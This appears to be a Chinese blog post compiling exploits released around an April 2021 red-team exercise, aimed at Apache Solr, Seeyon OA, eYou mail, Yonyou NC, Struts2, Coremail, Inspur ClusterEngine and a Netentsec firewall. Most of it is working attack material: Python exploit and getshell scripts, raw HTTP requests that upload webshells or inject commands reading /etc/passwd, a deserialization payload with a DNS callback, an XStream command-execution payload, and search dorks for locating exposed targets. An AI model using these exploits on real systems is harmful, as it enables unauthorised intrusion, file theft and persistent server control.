搜索

Solr 任意文件读取漏洞【历史漏洞】
该漏洞是由于Apache Solr在默认安装时不会开启身份验证,攻击者在未授权情况下访问Config API打开requestDispatcher.requestParsers.enableRemoteStreaming开关,进而通过构造恶意请求,执行SSRF攻击,读取目标服务器的任意文件。
影响范围
Apache Solr <= 8.8.1
POC1

http://ip//solr/db/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd  (db为存在的应用名) 

POC2

http://ip//solr/db/debug/dump?param=ContentStreams(db为存在的应用名) 

POST提交:stream.url=file:///etc/passwd
EXP

# solr任意文件下载漏洞poc

coding=utf-8

import requests
import json
import argparse

TIMEOUT = 20

def run(target: str, action: str):

try:
    admin_url = target + "/solr/admin/cores?indexInfo=false&wt=json"
    response = requests.get(admin_url, verify=False, timeout=TIMEOUT)
    if response.status_code == 200 or "name" in response.text:
        data = json.loads(response.content)
        for i in data["status"]:
            key = data["status"][i]["name"]
            return attack(key, target, action)
except Exception as e:
    error = "[-] {} run error:{}".format(target, str(e))
    raise RuntimeError(error)
return None

def attack(core_name: str, target: str, action: str):

session = requests.session()
config_url = target + "/solr/" + core_name + "/config"
json_data = {"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": "true"}}
response = session.post(config_url, data=json.dumps(json_data), timeout=TIMEOUT)
if response and 200 != response.status_code: return None

dump_url = target + "/solr/" + core_name + "/debug/dump?param=ContentStreams"
dump_data = {"stream.url": action}
response = session.post(dump_url, data=dump_data, timeout=TIMEOUT)
if response is None:
    return None
elif 200 == response.status_code:
    content = json.loads(response.text)
    return content['streams'][0]['stream']
elif 500 == response.status_code:
    return response.text
else:
    return None

if name == '__main__':

parser = argparse.ArgumentParser(description='Solr 任意文件下载漏洞POC.')
parser.add_argument('-u',"--url",
                    help='solr attack target', required=True)
parser.add_argument('-a', '--action',
                    help='file or url', required=True)
args = parser.parse_args()
print("[+] check {} ,action:get {}".format(args.url, args.action))
result = run(args.url, args.action)
if result is None: print("[-] Not found vuln")
print("[+] The result is as follows:\n{}".format(result))

Apache solr SSRF(服务器端请求伪造)
影响版本
Apache Solr < 8.8.2
POC
/solr/db/replication?command=fetchindex&masterUrl=http://xxxx
参考链接
https://github.com/keven1z/SolrfilereadPOC

致远OA ajax.do 文件上传漏洞【历史漏洞】
由于致远OA旧版本某些接口存在权限绕过漏洞,攻击者通过特制的HTTP请求将导致接口的权限机制被绕过,并结合某些接口功能实现在未授权情况下上传恶意文件,从而控制目标主机,经验证,该漏洞为2020年12月29日,致远官网发布的2020年10-12月安全通告中历史漏洞。
影响范围
致远OA V8.0
致远OA V7.1、V7.1SP1
致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3
致远OA V6.0、V6.1SP1、V6.1SP2
致远OA V5.x
POC

POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1

Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
loginPageURL=; login_locale=zh_CN;
Content-Type: application/x-www-form-urlencoded

managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTY%C2%93%C2%A2H%10%7E%C3%9E%C3%BD%15%C2%84%2F%C3%9A%C3%9136%C2%82%C2%8C%C3%ADN%C3%ACC%7B%21%C2%A2%C2%A8%C2%A0%5C%1B%C3%BB%00U%C3%88a%15%C2%B0rH%C3%991%C3%BF%7D%0B%C2%B0%C2%A7%7Bb%7B%C3%AB%C2%A52%C2%B32%C2%BF%C3%8A%C3%BB%C2%AF%C3%97%C3%AE%29%C2%B9%C3%A0%029%07%C2%92z%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%B8%C2%96ts%2F%C3%8B%C2%BB%C3%AF%C3%A2y%C2%95%5E%C2%BC%2C%0B%C2%93%C2%B8%7E%C3%94%C3%B2K%18%C3%BBL%C3%AA%C3%A4%01%C3%B3%27%C3%93%C3%A9%C3%B7%C2%9F%C2%AE%C2%9E%C3%AB%C2%A4i%C3%B6%C2%94y%1EI%C3%A2%C2%A7%C3%8E%C3%B7%C3%9F%C2%99%C3%B6%C3%BC%169%C2%A5%C3%93%0F%C2%93%C3%BE%C2%8E%C2%9A%C3%A4%C3%86%25%C3%8C%C2%BD%0B%C2%93%C2%BE%C3%93%1C%05%C2%88%C2%BD%2B%C3%B3%C2%89Z%C2%AF%C3%86%7F%C3%AC%60%0C%C3%BBQ%C2%96V%C2%9D%C2%87%C2%9F%C2%A0%C3%8C%C3%9D%C2%81%2C%C3%B0%10%C2%AA%3D%C3%98%C2%89%C3%A9%0D%C3%8CR%C3%A2rcVZ%06%C2%B9%2B%0A%C2%B7-%C2%AEel%C3%A8%2CU%16%C3%8C%C2%92r%C3%8D%C2%A5%01%C3%84%C3%B3%02%C3%B0z%C2%B1%C3%86J%C3%A9jc%C3%B98x%29%C2%8F%C3%A2%22%C2%B65%C3%89%C2%87X%27%C2%80C%C2%A5%1B%C2%B1%C3%A1F%1B%12%29%1A%3E%3B%C2%B1r%C3%9Db5%05X%C2%8F%C2%A0%C2%888%5B%13%C2%AE%C2%96%01%C2%91%24%C2%A2%1C%C2%88c%02k%7C%C2%BC%C3%A0%2CM%18%C3%90%C3%B7l%1D%26Y%C3%83%C2%9B%7Ea%C3%B1%2B%01%2C%C3%95%C3%B2S%19%C3%85%C2%B5%C2%8DM%21%C2%87R%C2%B9%C2%8B%C2%AA%7F%00%C3%BF%C3%B2%C3%8D%16%C3%B5%C3%88%15%17%C3%842%C3%95%C3%94%C3%A5%C2%86%C2%8F%C2%92%C2%A8d%C2%96%C2%A9%C3%9C%C2%A4%C3%85%C3%91%C2%B7%C3%8D%C2%80%C2%B5%0D%C3%A1%0C%C3%88dFun%C2%80%C2%ADJ%C3%8BP%11%C2%88s%5D%C2%9E%C2%B7z%07q%1CP%0C%22%C2%89%C2%9B%C3%94%C3%A3%C2%95%01%C2%A0%C2%B4L%C3%A9-%3F%C2%B8Bc%C2%959%C3%86%C3%86%C3%9FsU%00%C3%B8%C2%8Do%C2%93+%C3%B4L%15I%C2%8B%1CZ%21%1A%C3%91%C3%B8Xh%C2%AE%0Ai%C3%99%C3%9A%C2%AD%C2%B1%C2%8Al%C2%8C%0A%C3%BB%C3%98b%C3%8B%C2%A2%C2%94m%C2%A6U%C2%B8%C3%86%15r1d%C2%9D%C3%A9yt2%C3%99g%C2%9A%C3%93%3A%C3%AFg%C3%9B%C2%A8%C3%B5V%01%C3%8D%01%C3%8D%C3%9F%3Do%C2%B1%12%01%C2%8C%C2%AEP%C2%AC%10%C2%9C%09%07%C2%B8%5C%C2%A5.%06%C2%BEscC%C3%BB%C2%B0%1F%C3%98%C2%87%0D%C3%99%1A6%C2%B2%22%C3%BD%C2%BC%3DH%03%2B%C2%94F%C2%80%C3%93oM%0DB%C3%A1%0AM%C3%95%C2%B0%C2%8Cj%60k%7E%085%29s%C3%88y%C2%B4%C3%A7%C3%90%C3%95ic%1C%C2%BF%C3%91k%0C%11%C2%9C%23ZW5p%C2%B1%C2%82%C3%A4%C3%A9j%C2%A2%C3%AA%C2%9BP%3E%C3%A4%C3%91%C2%9A%C3%86%C3%A0%C2%98%C3%BBd%13V%C2%85m%02%C3%BF%C3%88%C3%A9Q%1D%C2%AB%C3%86%C3%A9%C3%82%C2%91%C2%9F+%C2%8B%C3%B8%C3%89%C2%87%3Fc%C3%BB%C3%97%3FS%C2%99H%C2%A1%C2%AC5%C3%B2i%C2%9D%2F%40%C3%BCt%C3%BD%C2%86%C2%AF%C2%9DG.%C3%96yZ%C2%9F%04%C2%8AA%0AH%C2%A3%C3%97%C3%96%C2%A7%C3%96k%C3%BC%C3%BA%C2%B56%C3%B2%C3%B4L%C3%A5+%C2%B1%C2%88pvY%C2%9B%C3%A6c%C2%91%C3%89%C2%A2%C2%80+%C2%99%C3%9C%C2%A01%2C%5C%03%C3%9D%C3%A8%C3%9Bt%C2%AF%2B%0B%25R%C3%A74%C2%AF%C3%A5%C3%9D%C2%AEh%C3%BA%C2%83S%C3%91%3E%C3%96%C2%B1M%7BU%5E%C2%AE%100u%04%C3%B8%7Das%3A%7B%C3%84%C3%BA%C3%9B%1F%05%C2%A8i%3A%C2%B3.%3E%26%C3%94%C3%8F%C2%94%C3%86%40%C3%A3%C2%87%2B7VX%C3%8B%10%22%1A%1F%C3%B5C%C2%AF%C2%A0%C2%B1%C3%88%00%09%C2%9A%C2%9E%C3%9Es%C3%A3%02%C2%8A%C3%BA%10%C3%92%C3%9A%C3%AE%C2%A6%C3%A3%C2%A6%27%01%C2%A7%10%C3%87%C2%9C%C2%B0%C2%AE%C2%A8%C2%B3%C2%BB%C3%A8Z%C2%B6u%5D%C2%95.%C2%BF%7F%7C%C2%9Fq%26%2B%C3%A2%3E%0E3%C3%90%C2%9F%C2%BCh%C3%B3o%C3%83%C2%99%07%12H%C3%87%1C%C3%9E%C3%AFv%C3%82%3FW%C3%AA%C3%BDw%C2%AA%5B%C2%B3%3B%C3%93%C3%9A%C2%B6L%C3%AF%0E%C3%98o%C3%AFIq%3AQ%C2%80f%09%3C%7C%C3%A9%1C%0F%C2%8B%C2%AF%C3%8F%1F%C2%97%C3%84%C3%87-%C3%93o%18%14%C3%B7%3E%C2%82%C3%BF%C2%9F.%40I%C3%A6Q%C3%87%7E%7C%C2%AF%C2%B7+%25%C2%A0wb%C2%B2%C3%9C%C3%89C%C3%80TU%C3%95%7Bx%C3%AD%C3%BE%C2%A0%C2%AB%C2%91%C2%AE%C3%87%C3%97%C3%BA%C3%8E%2F%C2%85%C3%97%C3%BD%C3%BB_%2F%07M%C2%ADU%05%00%00

冰蝎3默认japx马pass:rebeyond

webshell地址:http://xxx.xxx.xxx.xxx/seeyon/mmd.jspx
成功返回

HTTP/1.1 500

{
"message":null,
"code":"0614448583",
"details":null
}

亿邮电子邮件系统远程命令执行
参考链接 https://github.com/Tas9er/EYouMailRCE
POC

POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1

Host: 192.168.10.1
Content-Length: 25
Accept: /
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: EMPHPSID=ffah74s753ae239996a1mmbld0; empos=0
Connection: close

type='|cat /etc/passwd||'

其他漏洞信息(不详细整理,百度即可找到相关文章)

1、MYBB SQL 注入漏洞(CNVD-2021-25709)【可信度 100%】
MyBB 是᳿款免费的开源论坛软件。MyBB 1.8.26 之前版本的主题属性存在 SQL 注入漏洞。

3、用友 NC 1DAY 反序列化【可信度 100%】

用友 NC 面向集团企业的世界级高端管理软件,发现存在任意文件上传漏洞,利用 apache commonscollections库可执行反序列化。

4、钓鱼邮件【可信度 100%】

来源网络情报,发现钓鱼邮件内含有恶意 execl 文件,文件点击可造成远程控制等威胁,微步在线已验 证。 
    1)封禁 IP192.31.96.152;
    2)注意恶意邮件后缀@rainmetal.cn,不要点击此类邮件后缀发送的邮件。

5、和信创天云桌面命令执行漏洞任意文件上传【可信度 60%】

和信下᳿代云桌面系统(VENGD),是国内领先的基于 NGD架构的桌面虚拟化 产品,它融合了 VDI、VOI、IDV 三大架构优势,实现了前后端混合计算,在调度服务器后端计算资源的 同时更能充分利用前端资源,和信下᳿代云桌面不仅可以满足随时随地移动办公的需求,更可以在窄带环 境下实现 3D 高清播放和外设硬件的全面兼容,满足大规模终端的管理、安全、运维需求。疑似和信创天 云桌面存在任意文件上传漏洞。

7、DZZOFFICE 最新版 RCE【可信度 100%】

DzzOffice是一款开源的云存储与应用管理工具,主要可用于企业管理阿里云、亚马逊等云存储等空间, 把空间可视化分配给成员使用。发现最新版存在 RCE,经验证参数 bz 存在 SQL 注入漏洞。

8、深信服和致远 OA 文件上传漏洞情报【可信度 60%】

该情报属于网络情报暂无相关细节进行验证。

9、F5 BIG-IP 16.0.X-ICONTROL REST 远程代码执行【可信度 100%】

F5 BIG-IP 是美国 F5 公司的᳿款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平 台。F5 BIG-IP 存在安全漏洞,该漏洞允许未经身份验证的攻击者通过 BIG-IP 管理界面和自身 IP 地址对iContronl REST 接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。

10、多款 HUAWEI 产品内存泄露漏洞【可信度 100%】

Huawei  IPS Moudule 等都是中国华为(Huawei)公司的产品。Huawei IPS Moudule 是一款入侵防御系统 (IPS)模块。NGFW Moudule 是一款下一代防火墙(NGFW)模块。Secospace USG6600 是᳿款下一代防 火墙产品。多款 Huawei产品存在内存泄露漏洞。由于产品在某些场景下对内存释放处理不当,远程攻击 者可能会发送特定报文来触发该漏洞。成功利用该漏洞可能导致服务异常。

11、通达 OA V11,7 在线任意用户登录【可信度 100%】

通达 OA V11.7 版本存在这任意用户登录漏洞,该漏洞需要管理员在线才可以登录系统,另外᳿个方面就 是编译在线的 瀈濼濷 值进行判断。

12、CVE-2021-21975:VREALIZE OPERATIONS MANAGER SSRF【可信度 100%】

2021 年 3 月 31 日,VMWare 官方发布了 VMSA-2021-0004 的风险通告,漏洞编号为 CVE-2021-21975, CVE-2021-21983,漏洞等级:高危,漏洞评分 8.6。CVE-2021-21975:通过网络访问vRealize Operations Manager  API 的恶意攻击者可以执行服务器端请求伪造攻击,以窃取管理凭据。

4月10号安全情报
用友NC 反序列化利用
漏洞关注点

/service/~xbrl/XbrlPersistenceServlet

EXP

import requests

import threadpool
import urllib3import sys
import base64
ip = ""
dnslog = "x79x37x64x70" #dnslog把字符串转16进制替换该段,测试用的ceye.io可以回显
data = "xacxedx00x05x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x01x73x72x00x0cx6ax61x76x61x2ex6ex65x74x2ex55x52x4cx96x25x37x36x1axfcxe4x72x03x00x07x49x00x08x68x61x73x68x43x6fx64x65x49x00x04x70x6fx72x74x4cx00x09x61x75x74x68x6fx72x69x74x79x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx4cx00x04x66x69x6cx65x71x00x7ex00x03x4cx00x04x68x6fx73x74x71x00x7ex00x03x4cx00x08x70x72x6fx74x6fx63x6fx6cx71x00x7ex00x03x4cx00x03x72x65x66x71x00x7ex00x03x78x70xffxffxffxffx00x00x00x50x74x00x11"+dnslog+"x3ax38x30x74x00x00x74x00x0e"+dnslog+"x74x00x04x68x74x74x70x70x78x74x00x18x68x74x74x70x3ax2fx2f"+dnslog+"x3ax38x30x78"
uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
req = requests.post("http://+"ip"+/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25)
print (req.text)

用友NC协同管理软件存在目录遍历漏洞
漏洞关注点

/NCFindWeb?service=IPreAlertConfigService&filename=

齐治堡垒机某版本任意用户登录
漏洞关注点

/audit/gui_detail_view.php

POC

/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

Coremail 邮件系统任意文件上传漏洞【历史漏洞】
漏洞危害:
其特定版本范围内存在任意文件上传漏洞,攻击者可以上传webshell,从而造成远程代码执行。
影响范围
Coremail <= XT5.x
漏洞复现:
使用网上流传POC 进行验证 https://github.com/xiaoshu-bit/CoreMailUploadRce

pip3 install -r requirements.txt

python3 coremail_upload.py -u http://127.0.0.1:1111
文件上传POC:

POST /webinst/action.jsp HTTP/1.1

Host: 120.136.129.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Connection: close

func=checkserver&webServerName=127.0.0.1:6132/%0d@/home/coremail/web/webapp/justtest.jsp%20JUSTTEST
上传文件位置: http://ip:port/coremail/justtest.jsp

Apache Struts2补丁绕过0day(实际为S2-052)
影响版本
2.1.1到2.3.x之前的2.3.x和2.5.13之前的2.5.x
漏洞关注点

com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource

EXP
<map>
<entry>

<jdk.nashorn.internal.objects.NativeString>
  <flags>0</flags>
  <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
    <dataHandler>
      <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
        <is class="javax.crypto.CipherInputStream">
          <cipher class="javax.crypto.NullCipher">
            <initialized>false</initialized>
            <opmode>0</opmode>
            <serviceIterator class="javax.imageio.spi.FilterIterator">
              <iter class="javax.imageio.spi.FilterIterator">
                <iter class="java.util.Collections$EmptyIterator"/>
                <next class="java.lang.ProcessBuilder">
                  <command>
                    <string>calc.exe</string>
                  </command>
                  <redirectErrorStream>false</redirectErrorStream>
                </next>
              </iter>
              <filter class="javax.imageio.ImageIO$ContainsFilter">
                <method>
                  <class>java.lang.ProcessBuilder</class>
                  <name>start</name>
                  <parameter-types/>
                </method>
                <name>foo</name>
              </filter>
              <next class="string">foo</next>
            </serviceIterator>
            <lock/>
          </cipher>
          <input class="java.lang.ProcessBuilder$NullInputStream"/>
          <ibuffer></ibuffer>
          <done>false</done>
          <ostart>0</ostart>
          <ofinish>0</ofinish>
          <closed>false</closed>
        </is>
        <consumed>false</consumed>
      </dataSource>
      <transferFlavors/>
    </dataHandler>
    <dataLen>0</dataLen>
  </value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>

</entry>
<entry>

<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

</entry>
</map>

4月11-4月12安全情报
浪潮 ClusterEngineV4.0 任意命令执行
漏洞关注点

/alarmConfig

fofa_dork

title="TSCEV4.0"

参考地址

https://github.com/xiaoshu-bit/ClusterEngineRce

POC

pip3 install -r requirements.txt

python3 clusterengine_poc.py -u http://127.0.0.1:1111

def verify(self, first=False):
    target = self.scan_info['Target']
    verbose = self.scan_info['Verbose']
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    payload = "op=login&username=asd&password=asd'"
    try:
        url = urljoin(target, '/login')
        resp = req(url, 'post', data=payload,headers=headers,verify=False)
        if ('{"err"' in resp.text) and (" syntax error: unexpected end of file" in resp.text):
            log.highlight("found Inspur ClusterEngine v4.0 Remote Code Execution")
            self.scan_info['Success'] = True
            self.scan_info['Ret']['VerifyInfo']['URL'] = url
            self.scan_info['Ret']['VerifyInfo']['Payload'] = payload
            self.scan_info['Ret']['VerifyInfo']['method'] = "POST"
            return
    except Exception as e:
        log.info("[*]Request to target URL fail! {}".format(e))

志远OA session泄露&&任意文件上传漏洞
致远OA通过发送特殊请求获取session,在通过文件上传接口上传webshell控制服务器

fofa_dork

title="致远"

漏洞复现
首先是一个获取管理cookie的漏洞。然后上传压缩文件进行解压。达到getshell的目的

POST /seeyon/thirdpartyController.do HTTP/1.1

Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Content-Length: 133
Content-Type: application/x-www-form-urlencoded

method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
上传压缩包

POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1

Host:192.168.10.2
Connection: close
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.25.1
Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5
Content-Length: 841
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b

--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="firstSave"
true
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="callMethod"
resizeLayout
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="isEncrypt"
0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="takeOver"
false
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="type"
0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="file1"; filename="11.png"
Content-Type: image/png
111
--59229605f98b8cf290a7b8908b34616b--
然后解压

POST /seeyon/ajax.do HTTP/1.1

Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=BDF7358D4C35C6D2BB99FADFEE21F913
Content-Length: 157

method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%222021-04-09%22%2C%225818374431215601542%22%5D
Getshell脚本

# coding: utf-8

import requests
import re
import time
proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}
def seeyon_new_rce(targeturl):

orgurl = targeturl
# 通过请求直接获取管理员权限cookie
targeturl = orgurl + 'seeyon/thirdpartyController.do'
post={"method":"access","enc":"TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4","clientPath":"127.0.0.1"}
response = requests.post(url=targeturl,data=post,proxies=proxy, timeout=60,verify=False)
rsp = ""
if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower():
    cookies = response.cookies
    cookies = requests.utils.dict_from_cookiejar(cookies)
    # 上传压缩文件
    aaa=cookies['JSESSIONID']
    print(aaa)
    targeturl = orgurl + 'seeyon/fileUpload.do?method=processUpload'
    files = [('file1', ('11.png', open('1.zip', 'r'), 'image/png'))]
    print()
    headers = {'Cookie':"JSESSIONID=%s"%aaa}
    data = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0',
            'isEncrypt': "0"}
    response = requests.post(url=targeturl,files=files,data=data, headers=headers,proxies=proxy,timeout=60,verify=False)
    if response.text:
        reg = re.findall('fileurls=fileurls\+","\+\'(.+)\'',response.text,re.I)
        print(reg)
        if len(reg)==0:
            exit("匹配失败")
        fileid=reg[0]
        targeturl = orgurl + 'seeyon/ajax.do'
        datestr = time.strftime('%Y-%m-%d')
        post = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + datestr + '%22%2C%22' + fileid + '%22%5D'
        #headers = {'Cookie': cookies}
        headers['Content-Type']="application/x-www-form-urlencoded"
        response = requests.post(targeturl, data=post,headers=headers,proxies=proxy,timeout=60,verify=False)
        print(response.text)

seeyon_new_rce("https://baidu.com/")
shell地址:/seeyon/common/designer/pageLayout/a2345678.jsp

网康下一代防火墙RCE
漏洞关注点

/directdata/direct/router

POC

POST /directdata/direct/router HTTP/1.1

Host: 192.168.10.6
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=q885n85a5es9i83d26rm102sk3; ys-active_page=s%3A
Content-Type: application/x-www-form-urlencoded
Content-Length: 160

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami>/var/www/html/1.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
1913098-20210415144140617-2110576336.png
其他信息
4月12日14时 最新发现天擎终端安全管理系统控制台存在远程命令执行漏洞,poc疑似已流出
4月12日12时 最新发现讯雷11存在二进制漏洞
4月12日12时 传出PHP zerodiMQ后门漏洞,poc已流出
4月12日10时 传出fastjson 1.2.75 绕过RCE漏洞,poc疑似已流出

参考地址:参考来源
https://www.freebuf.com/articles/268901.html http://www.hackdig.com/

hw poc exp

版权属于:三尺青锋
作品采用:本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。
5
查看目录

目录

来自 《4.08后hw爆出漏洞及部分其他历史漏洞小结》
评论

  1. 评论头像
    2021-09-16 回复

    Hi there, yes this paragraph is actually good and I have learned lot of things from it regarding blogging. thanks.

    1. 评论头像
      @Fluxilan 三尺青锋 作者
      2021-09-20 回复

      Thank you for your comments. Maybe you can communicate with me through TG: wechatpay_ kefu

三尺青锋

我本来要放弃你了,可你突然对我笑了。